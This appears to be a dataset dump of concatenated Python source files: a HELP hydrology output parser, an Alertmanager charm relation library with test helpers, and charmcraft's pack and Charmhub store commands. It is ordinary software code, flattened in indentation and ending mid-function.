output = {}
ncore = max(mp.cpu_count() if ncore is None else ncore, 1)
tstart = time.perf_counter()
calcul_progress = 0
N = len(cellparams)
pool = Pool(ncore)
for cell in pool.imap_unordered(run_help_singlecell, cellparams.items()):
output[cell[0]] = cell[1]
calcul_progress += 1
progress_pct = calcul_progress/N*100
tpassed = time.perf_counter() - tstart
tremain = (100-progress_pct)*tpassed/progress_pct/60
print(('\rHELP simulation in progress: %3.1f%% (%0.1f min remaining)'
" ") % (progress_pct, tremain), end='')
calcul_time = (time.perf_counter() - tstart)
print('\nTask completed in %0.2f sec' % calcul_time)
return output
# ---- Read HELP output
def read_monthly_help_output(filename):
"""
Read the monthly output from .OUT HELP file and return the data as
numpy arrays stored in a dictionary. Support the output format that was
modified from HELP 3.07 (see PR#2).
"""
with open(filename, 'r') as csvfile:
csvread = list(csv.reader(csvfile))
arr_years = []
vstack_precip = []
vstack_runoff = []
vstack_evapo = []
vstack_subrun1 = []
vstack_subrun2 = []
vstack_percol = []
vstack_rechg = []
year = None
i = 0
while True:
if i+1 >= len(csvread):
break
if len(csvread[i]) == 0:
i += 1
continue
line = csvread[i][0]
if 'MONTHLY TOTALS' in line:
year = int(line.split()[-1])
arr_years.append(year)
subrun1 = None
subrun2 = np.zeros(12).astype('float32')
percol = None
while True:
i += 1
if len(csvread[i]) == 0:
continue
line = csvread[i][0]
if '**********' in line:
break
elif 'PRECIPITATION' in line:
precip = np.array(line.split()[-12:]).astype('float32')
elif 'RUNOFF' in line:
runoff = np.array(line.split()[-12:]).astype('float32')
elif 'EVAPOTRANSPIRATION' in line:
evapo = np.array(line.split()[-12:]).astype('float32')
elif 'LAT. DRAINAGE' in line:
if subrun1 is None:
subrun1 = np.array(
line.split()[-12:]).astype('float32')
else:
subrun2 += np.array(
line.split()[-12:]).astype('float32')
elif 'PERCOLATION' in line:
if percol is None:
percol = np.array(line.split()[-12:]).astype('float32')
rechg = np.array(line.split()[-12:]).astype('float32')
vstack_precip.append(precip)
vstack_runoff.append(runoff)
vstack_evapo.append(np.array(evapo).astype('float32'))
vstack_rechg.append(np.array(rechg).astype('float32'))
vstack_percol.append(np.array(percol).astype('float32'))
if subrun1 is None:
vstack_subrun1.append(np.zeros(12).astype('float32'))
else:
vstack_subrun1.append(subrun1)
vstack_subrun2.append(subrun2)
elif 'FINAL WATER STORAGE' in line:
break
i += 1
data = {'years': np.array(arr_years).astype('uint16'),
'precip': np.vstack(vstack_precip),
'runoff': np.vstack(vstack_runoff),
'evapo': np.vstack(vstack_evapo),
'subrun1': np.vstack(vstack_subrun1),
'subrun2': np.vstack(vstack_subrun2),
'perco': np.vstack(vstack_percol),
'rechg': np.vstack(vstack_rechg)}
return data
def read_daily_help_output(filename):
"""
Read the daily output from .OUT HELP file and return the data as
numpy arrays stored in a dictionary.
"""
with open(filename, 'r') as csvfile:
csvread = list(csv.reader(csvfile))
nlay = None
arr_years = []
arr_days = []
arr_rain = []
arr_ru = []
arr_et = []
arr_ezone = []
arr_headfirst = []
arr_drainfirst = []
arr_leakfirst = []
arr_leaklast = []
year = None
nlay = nsub = None
for i, line in enumerate(csvread):
if line:
line = line[0]
if 'TOTAL NUMBER OF LAYERS' in line:
nlay = int(line.split()[-1])
elif 'TOTAL NUMBER OF SUBPROFILES' in line:
nsub = int(line.split()[-1])
if 'DAILY OUTPUT FOR YEAR' in line:
year = int(line.split()[-1])
days_in_year = 366 if calendar.isleap(year) else 365
elif year is not None:
try:
day = int(line[2:5])
rain = float(line[13:19])
ru = float(line[19:26])
et = float(line[26:33])
ezone = float(line[33:41])
headfirst = float(line[41:51])
drainfirst = float(line[51:61])
leakfirst = float(line[61:71])
leaklast = float(line[-10:])
except ValueError:
pass
else:
arr_years.append(year)
arr_days.append(day)
arr_rain.append(rain)
arr_ru.append(ru)
arr_et.append(et)
arr_ezone.append(ezone)
arr_headfirst.append(headfirst)
arr_drainfirst.append(drainfirst)
arr_leakfirst.append(leakfirst)
arr_leaklast.append(leaklast)
if day == days_in_year:
year = None
dataf = {'years': np.array(arr_years).astype('uint16'),
'days': np.array(arr_days).astype('uint16'),
'rain': np.array(arr_rain).astype('float32'),
'runoff': np.array(arr_ru).astype('float32'),
'et': np.array(arr_et).astype('float32'),
'ezone': np.array(arr_ezone).astype('float32'),
'head first': np.array(arr_headfirst).astype('float32'),
'drain first': np.array(arr_drainfirst).astype('float32'),
'leak first': np.array(arr_leakfirst).astype('float32'),
'leak last': np.array(arr_leaklast).astype('float32')
}
return dataf
``` |
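A small sketch of reading a single monthly HELP output file with the parser above; the file name is hypothetical:
```python
results = read_monthly_help_output("cell_4652.OUT")

print(results['years'])               # e.g. array([1990, 1991, ...], dtype=uint16)
print(results['rechg'].shape)         # (n_years, 12): monthly recharge per year
print(results['precip'].sum(axis=1))  # yearly precipitation totals
```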
{
"source": "jnsgruk/alertmanager-operator",
"score": 2
} |
#### File: alertmanager_k8s/v0/alertmanager_dispatch.py
```python
import logging
from typing import List
import ops
from ops.charm import CharmBase, RelationEvent, RelationJoinedEvent, RelationRole
from ops.framework import EventBase, EventSource, Object, ObjectEvents
from ops.model import Relation
# The unique Charmhub library identifier, never change it
LIBID = "37f1ca6f8fe84e3092ebbf6dc2885310"
# Increment this major API version when introducing breaking changes
LIBAPI = 0
# Increment this PATCH version before using `charmcraft publish-lib` or reset
# to 0 if you are raising the major API version
LIBPATCH = 1
# Set to match metadata.yaml
INTERFACE_NAME = "alertmanager_dispatch"
logger = logging.getLogger(__name__)
class ClusterChanged(EventBase):
"""Event raised when an alertmanager cluster is changed.
If an alertmanager unit is added to or removed from a relation,
then a :class:`ClusterChanged` event should be emitted.
"""
class AlertmanagerConsumerEvents(ObjectEvents):
"""Event descriptor for events raised by `AlertmanagerConsumer`."""
cluster_changed = EventSource(ClusterChanged)
class RelationManagerBase(Object):
"""Base class that represents relation ends ("provides" and "requires").
:class:`RelationManagerBase` is used to create a relation manager. This is done by inheriting
from :class:`RelationManagerBase` and customising the sub class as required.
Attributes:
name (str): consumer's relation name
"""
def __init__(self, charm: CharmBase, relation_name: str, relation_role: RelationRole):
super().__init__(charm, relation_name)
self.charm = charm
self._validate_relation(relation_name, relation_role)
self.name = relation_name
def _validate_relation(self, relation_name: str, relation_role: RelationRole):
try:
if self.charm.meta.relations[relation_name].role != relation_role:
raise ValueError(
f"Relation '{relation_name}' in the charm's metadata.yaml must be "
f"'{relation_role}' to be managed by this library, but instead it is "
f"'{self.charm.meta.relations[relation_name].role}'"
)
if self.charm.meta.relations[relation_name].interface_name != INTERFACE_NAME:
raise ValueError(
f"Relation '{relation_name}' in the charm's metadata.yaml must use the "
f"'{INTERFACE_NAME}' interface to be managed by this library, but "
f"instead it is '{self.charm.meta.relations[relation_name].interface_name}'"
)
except KeyError:
raise ValueError(f"Relation '{relation_name}' is not in the charm's metadata.yaml")
class AlertmanagerConsumer(RelationManagerBase):
"""A "consumer" handler to be used by charms that relate to Alertmanager (the 'requires' side).
To have your charm consume alertmanager cluster data, declare the interface's use in your
charm's metadata.yaml file:
```yaml
requires:
alertmanager:
interface: alertmanager_dispatch
```
A typical example of importing this library might be
```python
from charms.alertmanager_k8s.v0.alertmanager_dispatch import AlertmanagerConsumer
```
In your charm's `__init__` method:
```python
self.alertmanager_consumer = AlertmanagerConsumer(self, relation_name="alertmanager")
```
Every change in the alertmanager cluster emits a :class:`ClusterChanged` event that the
consumer charm can register and handle, for example:
```
self.framework.observe(self.alertmanager_consumer.on.cluster_changed,
self._on_alertmanager_cluster_changed)
```
The updated alertmanager cluster can then be obtained via the `get_cluster_info` method.
This consumer library expects the consumer charm to observe the `cluster_changed` event.
Arguments:
charm (CharmBase): consumer charm
relation_name (str): from consumer's metadata.yaml
Attributes:
charm (CharmBase): consumer charm
"""
on = AlertmanagerConsumerEvents()
def __init__(self, charm: CharmBase, relation_name: str = "alerting"):
super().__init__(charm, relation_name, RelationRole.requires)
self.framework.observe(
self.charm.on[self.name].relation_changed, self._on_relation_changed
)
self.framework.observe(
self.charm.on[self.name].relation_departed,
self._on_relation_departed,
)
self.framework.observe(self.charm.on[self.name].relation_broken, self._on_relation_broken)
def _on_relation_changed(self, event: ops.charm.RelationChangedEvent):
"""This hook notifies the charm that there may have been changes to the cluster."""
if event.unit: # event.unit may be `None` in the case of app data change
# inform consumer about the change
self.on.cluster_changed.emit()
def get_cluster_info(self) -> List[str]:
"""Returns a list of ip addresses of all the alertmanager units."""
alertmanagers: List[str] = []
if not (relation := self.charm.model.get_relation(self.name)):
return alertmanagers
for unit in relation.units:
if address := relation.data[unit].get("public_address"):
alertmanagers.append(address)
return sorted(alertmanagers)
def _on_relation_departed(self, _):
"""This hook notifies the charm that there may have been changes to the cluster."""
self.on.cluster_changed.emit()
def _on_relation_broken(self, _):
"""This hook notifies the charm that a relation has been completely removed."""
# inform consumer about the change
self.on.cluster_changed.emit()
class AlertmanagerProvider(RelationManagerBase):
"""A "provider" handler to be used by charms that relate to Alertmanager (the 'provides' side).
To have your charm provide alertmanager cluster data, declare the interface's use in your
charm's metadata.yaml file:
```yaml
provides:
alerting:
interface: alertmanager_dispatch
```
A typical example of importing this library might be
```python
from charms.alertmanager_k8s.v0.alertmanager_dispatch import AlertmanagerProvider
```
In your charm's `__init__` method:
```python
self.alertmanager_provider = AlertmanagerProvider(self, self._relation_name, self._api_port)
```
Then inform consumers on any update to alertmanager cluster data via
```python
self.alertmanager_provider.update_relation_data()
```
This provider auto-registers relation events on behalf of the main Alertmanager charm.
Arguments:
charm (CharmBase): consumer charm
relation_name (str): relation name (not interface name)
api_port (int): alertmanager server's api port; this is needed here to avoid accessing
charm constructs directly
Attributes:
charm (CharmBase): the Alertmanager charm
"""
def __init__(self, charm, relation_name: str = "alerting", api_port: int = 9093):
super().__init__(charm, relation_name, RelationRole.provides)
self._api_port = api_port
events = self.charm.on[self.name]
# No need to observe `relation_departed` or `relation_broken`: data bags are auto-updated
# so both events are addressed on the consumer side.
self.framework.observe(events.relation_joined, self._on_relation_joined)
@property
def api_port(self):
"""Get the API port number to use for alertmanager."""
return self._api_port
def _on_relation_joined(self, event: RelationJoinedEvent):
"""This hook stores the public address of the newly-joined "alerting" relation.
This is needed for consumers such as prometheus, which should be aware of all alertmanager
instances.
"""
self.update_relation_data(event)
def _generate_relation_data(self, relation: Relation):
"""Helper function to generate relation data in the correct format."""
public_address = (
f"{self.charm.model.get_binding(relation).network.bind_address}:{self.api_port}"
)
return {"public_address": public_address}
def update_relation_data(self, event: RelationEvent = None):
"""Helper function for updating relation data bags.
This function can be used in two different ways:
- update relation data bag of a given event (e.g. a newly joined relation);
- update relation data for all relations
Args:
event: The event whose data bag needs to be updated. If it is None, update data bags of
all relations.
"""
if event is None:
# update all existing relation data
# a single consumer charm's unit may be related to multiple providers
if self.name in self.charm.model.relations:
for relation in self.charm.model.relations[self.name]:
relation.data[self.charm.unit].update(self._generate_relation_data(relation))
else:
# update relation data only for the newly joined relation
event.relation.data[self.charm.unit].update(
self._generate_relation_data(event.relation)
)
```
#### File: tests/unit/helpers.py
```python
from typing import Callable, Dict
from unittest.mock import patch
def patch_network_get(private_address="10.1.157.116") -> Callable:
def network_get(*args, **kwargs) -> dict:
"""Patch for the not-yet-implemented testing backend needed for `bind_address`.
This patch decorator can be used for cases such as:
self.model.get_binding(event.relation).network.bind_address
"""
return {
"bind-addresses": [
{
"mac-address": "",
"interface-name": "",
"addresses": [{"hostname": "", "value": private_address, "cidr": ""}],
}
],
"egress-subnets": ["10.152.183.65/32"],
"ingress-addresses": ["10.152.183.65"],
}
return patch("ops.testing._TestingModelBackend.network_get", network_get)
def no_op(*args, **kwargs) -> None:
pass
def tautology(*args, **kwargs) -> bool:
return True
class PushPullMock:
"""Helper class for mocking filesystem operations."""
def __init__(self):
self._filesystem: Dict[str, str] = {}
def pull(self, path: str, *args, **kwargs) -> str:
return self._filesystem.get(path, "")
def push(self, path: str, source: str, *args, **kwargs) -> None:
self._filesystem[path] = source
def patch_push(self) -> Callable:
return patch("ops.testing._TestingPebbleClient.push", self.push)
def patch_pull(self) -> Callable:
return patch("ops.testing._TestingPebbleClient.pull", self.pull)
``` |
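A sketch of how these helpers are typically combined in a unit test; the charm class import is a placeholder for whatever charm is under test:
```python
from unittest import TestCase
from ops.testing import Harness

from charm import AlertmanagerCharm  # placeholder: the charm under test

push_pull = PushPullMock()

class TestSmoke(TestCase):
    @patch_network_get(private_address="10.1.157.116")
    def test_startup(self):
        # Route Pebble push/pull through the in-memory fake filesystem.
        with push_pull.patch_push(), push_pull.patch_pull():
            harness = Harness(AlertmanagerCharm)
            self.addCleanup(harness.cleanup)
            harness.begin_with_initial_hooks()
```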
{
"source": "jnsgruk/charmcraft",
"score": 2
} |
#### File: charmcraft/commands/pack.py
```python
import logging
import zipfile
from argparse import Namespace
from charmcraft.cmdbase import BaseCommand, CommandError
from charmcraft.commands import build
from charmcraft.utils import (
SingleOptionEnsurer,
create_manifest,
load_yaml,
useful_filepath,
)
logger = logging.getLogger(__name__)
# the minimum set of files in a bundle
MANDATORY_FILES = {"bundle.yaml", "manifest.yaml", "README.md"}
def build_zip(zippath, basedir, fpaths):
"""Build the final file."""
zipfh = zipfile.ZipFile(zippath, "w", zipfile.ZIP_DEFLATED)
for fpath in fpaths:
zipfh.write(fpath, fpath.relative_to(basedir))
zipfh.close()
def get_paths_to_include(config):
"""Get all file/dir paths to include."""
dirpath = config.project.dirpath
allpaths = set()
# all mandatory files
for fname in MANDATORY_FILES:
fpath = dirpath / fname
if not fpath.exists():
raise CommandError("Missing mandatory file: {}.".format(fpath))
allpaths.add(fpath)
# the extra files (relative paths)
for spec in config.parts:
fpaths = sorted(fpath for fpath in dirpath.glob(spec) if fpath.is_file())
logger.debug("Including per prime config %r: %s.", spec, fpaths)
allpaths.update(fpaths)
return sorted(allpaths)
_overview = """
Build and pack a charm operator package or a bundle.
You can `juju deploy` the resulting `.charm` or bundle's `.zip`
file directly, or upload it to Charmhub with `charmcraft upload`.
For the charm you must be inside a charm directory with a valid
`metadata.yaml`, `requirements.txt` including the `ops` package
for the Python operator framework, and an operator entrypoint,
usually `src/charm.py`. See `charmcraft init` to create a
template charm directory structure.
For the bundle you must already have a `bundle.yaml` (can be
generated by Juju) and a README.md file.
"""
class PackCommand(BaseCommand):
"""Build the bundle or the charm.
If charmcraft.yaml missing or its 'type' key indicates a charm,
use the "build" infrastructure to create the charm.
Otherwise pack the bundle.
"""
name = "pack"
help_msg = "Build the charm or bundle"
overview = _overview
needs_config = False # optional until we fully support charms here
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"-e",
"--entrypoint",
type=SingleOptionEnsurer(useful_filepath),
help=(
"The executable which is the operator entry point; defaults to 'src/charm.py'"
),
)
parser.add_argument(
"-r",
"--requirement",
action="append",
type=useful_filepath,
help=(
"File(s) listing needed PyPI dependencies (can be used multiple "
"times); defaults to 'requirements.txt'"
),
)
def run(self, parsed_args):
"""Run the command."""
# decide if this will work on a charm or a bundle
if self.config.type == "charm" or not self.config.project.config_provided:
self._pack_charm(parsed_args)
else:
if parsed_args.entrypoint is not None:
raise CommandError(
"The -e/--entry option is valid only when packing a charm"
)
if parsed_args.requirement is not None:
raise CommandError(
"The -r/--requirement option is valid only when packing a charm"
)
self._pack_bundle()
def _pack_charm(self, parsed_args):
"""Pack a charm."""
# adapt arguments to use the build infrastructure
parsed_args = Namespace(
**{
"from": self.config.project.dirpath,
"entrypoint": parsed_args.entrypoint,
"requirement": parsed_args.requirement,
}
)
# mimic the "build" command
validator = build.Validator()
args = validator.process(parsed_args)
logger.debug("working arguments: %s", args)
builder = build.Builder(args, self.config)
builder.run()
def _pack_bundle(self):
"""Pack a bundle."""
# get the config files
bundle_filepath = self.config.project.dirpath / "bundle.yaml"
bundle_config = load_yaml(bundle_filepath)
if bundle_config is None:
raise CommandError(
"Missing or invalid main bundle file: '{}'.".format(bundle_filepath)
)
bundle_name = bundle_config.get("name")
if not bundle_name:
raise CommandError(
"Invalid bundle config; missing a 'name' field indicating the bundle's name in "
"file '{}'.".format(bundle_filepath)
)
# so far 'pack' works for bundles only (later this will operate also on charms)
if self.config.type != "bundle":
raise CommandError(
"Bad config: 'type' field in charmcraft.yaml must be 'bundle' for this command."
)
# pack everything
project = self.config.project
manifest_filepath = create_manifest(project.dirpath, project.started_at)
try:
paths = get_paths_to_include(self.config)
zipname = project.dirpath / (bundle_name + ".zip")
build_zip(zipname, project.dirpath, paths)
finally:
manifest_filepath.unlink()
logger.info("Created '%s'.", zipname)
```
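For reference, a stand-alone sketch of the `build_zip` helper defined above, zipping a couple of files relative to a hypothetical bundle directory:
```python
from pathlib import Path

basedir = Path("my-bundle")  # hypothetical project directory
paths = [basedir / "bundle.yaml", basedir / "README.md"]
build_zip(basedir / "my-bundle.zip", basedir, paths)
```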
#### File: commands/store/__init__.py
```python
import ast
import hashlib
import json
import logging
import pathlib
import string
import tempfile
import textwrap
import zipfile
from collections import namedtuple
from operator import attrgetter
import yaml
from humanize import naturalsize
from tabulate import tabulate
from charmcraft.cmdbase import BaseCommand, CommandError
from charmcraft.utils import (
ResourceOption,
SingleOptionEnsurer,
get_templates_environment,
useful_filepath,
)
from .store import Store
from .registry import ImageHandler
logger = logging.getLogger("charmcraft.commands.store")
# some types
EntityType = namedtuple("EntityType", "charm bundle")(charm="charm", bundle="bundle")
ResourceType = namedtuple("ResourceType", "file oci_image")(
file="file", oci_image="oci-image"
)
LibData = namedtuple(
"LibData",
"lib_id api patch content content_hash full_name path lib_name charm_name",
)
OCIImageSpec = namedtuple("OCIImageSpec", "organization name reference")
# The token used in the 'init' command (as bytes for easier comparison)
INIT_TEMPLATE_TOKEN = b"TEMPLATE-TODO"
def get_name_from_metadata():
"""Return the name if present and plausible in metadata.yaml."""
try:
with open("metadata.yaml", "rb") as fh:
metadata = yaml.safe_load(fh)
charm_name = metadata["name"]
except (yaml.error.YAMLError, OSError, KeyError):
return
return charm_name
def create_importable_name(charm_name):
"""Convert a charm name to something that is importable in python."""
return charm_name.replace("-", "_")
def create_charm_name_from_importable(charm_name):
"""Convert a charm name from the importable form to the real form."""
# _ is invalid in charm names, so we know it's intended to be '-'
return charm_name.replace("_", "-")
class LoginCommand(BaseCommand):
"""Login to Charmhub."""
name = "login"
help_msg = "Login to Charmhub"
overview = textwrap.dedent(
"""
Login to Charmhub.
Charmcraft will provide a URL for the Charmhub login. When you have
successfully logged in, charmcraft will store a token for ongoing
access to Charmhub at the CLI.
Remember to `charmcraft logout` if you want to remove that token
from your local system, especially in a shared environment.
See also `charmcraft whoami` to verify that you are logged in.
"""
)
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
store.login()
logger.info("Logged in as '%s'.", store.whoami().username)
class LogoutCommand(BaseCommand):
"""Clear Charmhub token."""
name = "logout"
help_msg = "Logout from Charmhub and remove token"
overview = textwrap.dedent(
"""
Clear the Charmhub token.
Charmcraft will remove the local token used for Charmhub access.
This is important on any shared system because the token allows
manipulation of your published charms.
See also `charmcraft whoami` to verify that you are logged in,
and `charmcraft login`.
"""
)
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
store.logout()
logger.info("Charmhub token cleared.")
class WhoamiCommand(BaseCommand):
"""Show login information."""
name = "whoami"
help_msg = "Show your Charmhub login status"
overview = textwrap.dedent(
"""
Show your Charmhub login status.
See also `charmcraft login` and `charmcraft logout`.
"""
)
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
result = store.whoami()
data = [
("name:", result.name),
("username:", result.username),
("id:", result.userid),
]
table = tabulate(data, tablefmt="plain")
for line in table.splitlines():
logger.info(line)
class RegisterCharmNameCommand(BaseCommand):
"""Register a charm name in Charmhub."""
name = "register"
help_msg = "Register a charm name in Charmhub"
overview = textwrap.dedent(
"""
Register a charm name in Charmhub.
Claim a name for your operator in Charmhub. Once you have registered
a name, you can upload charm operator packages for that name and
release them for wider consumption.
Charmhub operates on the 'principle of least surprise' with regard
to naming. A charm with a well-known name should provide the best
operator for the microservice most people associate with that name.
Charms can be renamed in the Charmhub, but we would nonetheless ask
you to use a qualified name, such as `yourname-charmname` if you are
in any doubt about your ability to meet that standard.
We discuss registrations on Charmhub's Discourse:
https://discourse.charmhub.io/c/charm
Registration will take you through login if needed.
"""
)
common = True
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument("name", help="The name to register in Charmhub")
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
store.register_name(parsed_args.name, EntityType.charm)
logger.info(
"You are now the publisher of charm %r in Charmhub.", parsed_args.name
)
class RegisterBundleNameCommand(BaseCommand):
"""Register a bundle name in the Store."""
name = "register-bundle"
help_msg = "Register a bundle name in the Store"
overview = textwrap.dedent(
"""
Register a bundle name in the Store.
Claim a name for your bundle in Charmhub. Once you have registered
a name, you can upload bundle packages for that name and
release them for wider consumption.
Charmhub operates on the 'principle of least surprise' with regard
to naming. A bundle with a well-known name should provide the best
system for the service most people associate with that name. Bundles
can be renamed in the Charmhub, but we would nonetheless ask
you to use a qualified name, such as `yourname-bundlename` if you are
in any doubt about your ability to meet that standard.
We discuss registrations on Charmhub's Discourse:
https://discourse.charmhub.io/c/charm
Registration will take you through login if needed.
"""
)
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument("name", help="The name to register in Charmhub")
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
store.register_name(parsed_args.name, EntityType.bundle)
logger.info(
"You are now the publisher of bundle %r in Charmhub.", parsed_args.name
)
class ListNamesCommand(BaseCommand):
"""List the entities registered in Charmhub."""
name = "names"
help_msg = "List your registered charm and bundle names in Charmhub"
overview = textwrap.dedent(
"""
An overview of names you have registered to publish in Charmhub.
$ charmcraft names
Name Type Visibility Status
sabdfl-hello-world charm public registered
Visibility and status are shown for each name. `public` items can be
seen by any user, while `private` items are only for you and the
other accounts with permission to collaborate on that specific name.
Listing names will take you through login if needed.
"""
)
common = True
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
result = store.list_registered_names()
if not result:
logger.info("No charms or bundles registered.")
return
headers = ["Name", "Type", "Visibility", "Status"]
data = []
for item in result:
visibility = "private" if item.private else "public"
data.append(
[
item.name,
item.entity_type,
visibility,
item.status,
]
)
table = tabulate(data, headers=headers, tablefmt="plain")
for line in table.splitlines():
logger.info(line)
def get_name_from_zip(filepath):
"""Get the charm/bundle name from a zip file."""
try:
zf = zipfile.ZipFile(str(filepath))
except zipfile.BadZipFile:
raise CommandError("Cannot open {!r} (bad zip file).".format(str(filepath)))
# get the name from the given file (trying first if it's a charm, then a bundle,
# otherwise it's an error)
if "metadata.yaml" in zf.namelist():
try:
name = yaml.safe_load(zf.read("metadata.yaml"))["name"]
except Exception:
raise CommandError(
"Bad 'metadata.yaml' file inside charm zip {!r}: must be a valid YAML with "
"a 'name' key.".format(str(filepath))
)
elif "bundle.yaml" in zf.namelist():
try:
name = yaml.safe_load(zf.read("bundle.yaml"))["name"]
except Exception:
raise CommandError(
"Bad 'bundle.yaml' file inside bundle zip {!r}: must be a valid YAML with "
"a 'name' key.".format(str(filepath))
)
else:
raise CommandError(
"The indicated zip file {!r} is not a charm ('metadata.yaml' not found) "
"nor a bundle ('bundle.yaml' not found).".format(str(filepath))
)
return name
class UploadCommand(BaseCommand):
"""Upload a charm or bundle to Charmhub."""
name = "upload"
help_msg = "Upload a charm or bundle to Charmhub"
overview = textwrap.dedent(
"""
Upload a charm or bundle to Charmhub.
Push a charm or bundle to Charmhub where it will be verified.
This command will finish successfully once the package is
approved by Charmhub.
In the event of a failure in the verification process, charmcraft
        will report details of the failure; otherwise it will give you the
new charm or bundle revision.
Upload will take you through login if needed.
"""
)
common = True
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"filepath", type=useful_filepath, help="The charm or bundle to upload"
)
parser.add_argument(
"--release",
action="append",
help="The channel(s) to release to (this option can be indicated multiple times)",
)
def _validate_template_is_handled(self, filepath):
"""Verify the zip does not have any file with the 'init' template TODO marker.
This is important to avoid uploading low-quality charms that are just
bootstrapped and not corrected.
"""
# we're already sure we can open it ok
zf = zipfile.ZipFile(str(filepath))
tainted_filenames = []
for name in zf.namelist():
content = zf.read(name)
if INIT_TEMPLATE_TOKEN in content:
tainted_filenames.append(name)
if tainted_filenames:
raise CommandError(
"Cannot upload the charm as it include the following files with a leftover "
"TEMPLATE-TODO token from when the project was created using the 'init' "
"command: {}".format(", ".join(tainted_filenames))
)
def run(self, parsed_args):
"""Run the command."""
name = get_name_from_zip(parsed_args.filepath)
self._validate_template_is_handled(parsed_args.filepath)
store = Store(self.config.charmhub)
result = store.upload(name, parsed_args.filepath)
if result.ok:
logger.info("Revision %s of %r created", result.revision, str(name))
if parsed_args.release:
# also release!
store.release(name, result.revision, parsed_args.release)
logger.info("Revision released to %s", ", ".join(parsed_args.release))
else:
logger.info("Upload failed with status %r:", result.status)
for error in result.errors:
logger.info("- %s: %s", error.code, error.message)
class ListRevisionsCommand(BaseCommand):
"""List revisions for a charm or a bundle."""
name = "revisions"
help_msg = "List revisions for a charm or a bundle in Charmhub"
overview = textwrap.dedent(
"""
Show version, date and status for each revision in Charmhub.
For example:
$ charmcraft revisions mycharm
Revision Version Created at Status
1 1 2020-11-15 released
Listing revisions will take you through login if needed.
"""
)
common = True
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument("name", help="The name of the charm or bundle")
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
result = store.list_revisions(parsed_args.name)
if not result:
logger.info("No revisions found.")
return
headers = ["Revision", "Version", "Created at", "Status"]
data = []
for item in sorted(result, key=attrgetter("revision"), reverse=True):
            # use just the status, or include the error message/code in it (if they exist)
if item.errors:
errors = ("{0.message} [{0.code}]".format(e) for e in item.errors)
status = "{}: {}".format(item.status, "; ".join(errors))
else:
status = item.status
data.append(
[
item.revision,
item.version,
item.created_at.strftime("%Y-%m-%d"),
status,
]
)
table = tabulate(data, headers=headers, tablefmt="plain", numalign="left")
for line in table.splitlines():
logger.info(line)
class ReleaseCommand(BaseCommand):
"""Release a charm or bundle revision to specific channels."""
name = "release"
help_msg = "Release a charm or bundle revision in one or more channels"
overview = textwrap.dedent(
"""
Release a charm or bundle revision in the channel(s) provided.
Charm or bundle revisions are not published for anybody else until you
release them in a channel. When you release a revision into a channel,
        users who deploy the charm or bundle from that channel will see
the new revision as a potential update.
A channel is made up of `track/risk/branch` with both the track and
the branch as optional items, so formally:
[track/]risk[/branch]
Channel risk must be one of stable, candidate, beta or edge. The
track defaults to `latest` and branch has no default.
It is enough just to provide a channel risk, like `stable` because
the track will be assumed to be `latest` and branch is not required.
Some channel examples:
stable
edge
2.0/candidate
beta/hotfix-23425
1.3/beta/feature-foo
When releasing a charm, one or more resources can be attached to that
release, using the `--resource` option, indicating in each case the
resource name and specific revision. For example, to include the
resource `thedb` revision 4 in the charm release, do:
charmcraft release mycharm --revision=14 \\
--channel=beta --resource=thedb:4
        Releasing a revision will take you through login if needed.
"""
)
common = True
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument("name", help="The name of charm or bundle")
parser.add_argument(
"-r",
"--revision",
type=SingleOptionEnsurer(int),
required=True,
help="The revision to release",
)
parser.add_argument(
"-c",
"--channel",
action="append",
required=True,
help="The channel(s) to release to (this option can be indicated multiple times)",
)
parser.add_argument(
"--resource",
action="append",
type=ResourceOption(),
default=[],
help=(
"The resource(s) to attach to the release, in the <name>:<revision> format "
"(this option can be indicated multiple times)"
),
)
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
store.release(
parsed_args.name,
parsed_args.revision,
parsed_args.channel,
parsed_args.resource,
)
msg = "Revision %d of charm %r released to %s"
args = [parsed_args.revision, parsed_args.name, ", ".join(parsed_args.channel)]
if parsed_args.resource:
msg += " (attaching resources: %s)"
args.append(
", ".join(
"{!r} r{}".format(r.name, r.revision) for r in parsed_args.resource
)
)
logger.info(msg, *args)
class StatusCommand(BaseCommand):
"""Show channel status for a charm or bundle."""
name = "status"
help_msg = "Show channel and released revisions"
overview = textwrap.dedent(
"""
Show channels and released revisions in Charmhub.
Charm revisions are not available to users until they are released
into a channel. This command shows the various channels for a charm
and whether there is a charm released.
For example:
$ charmcraft status
Track Channel Version Revision
latest stable - -
candidate - -
beta - -
edge 1 1
Showing channels will take you through login if needed.
"""
)
common = True
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument("name", help="The name of the charm or bundle")
def _build_resources_repr(self, resources):
"""Build a representation of a list of resources."""
if resources:
result = ", ".join("{} (r{})".format(r.name, r.revision) for r in resources)
else:
result = "-"
return result
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
channel_map, channels, revisions = store.list_releases(parsed_args.name)
if not channel_map:
logger.info("Nothing has been released yet.")
return
# build easier to access structures
releases_by_channel = {item.channel: item for item in channel_map}
revisions_by_revno = {item.revision: item for item in revisions}
# process and order the channels, while preserving the tracks order
all_tracks = []
per_track = {}
branch_present = False
for channel in channels:
            # it's super rare to have more than just a handful of tracks (furthermore,
            # normally there's only one), so it's ok to do this sequential search
if channel.track not in all_tracks:
all_tracks.append(channel.track)
nonbranches_list, branches_list = per_track.setdefault(
channel.track, ([], [])
)
if channel.branch is None:
                # insert the channel right after its fallback, keeping risk ordering
for idx, stored in enumerate(nonbranches_list, 1):
if stored.name == channel.fallback:
nonbranches_list.insert(idx, channel)
break
else:
nonbranches_list.append(channel)
else:
branches_list.append(channel)
branch_present = True
headers = ["Track", "Channel", "Version", "Revision"]
resources_present = any(release.resources for release in channel_map)
if resources_present:
headers.append("Resources")
if branch_present:
headers.append("Expires at")
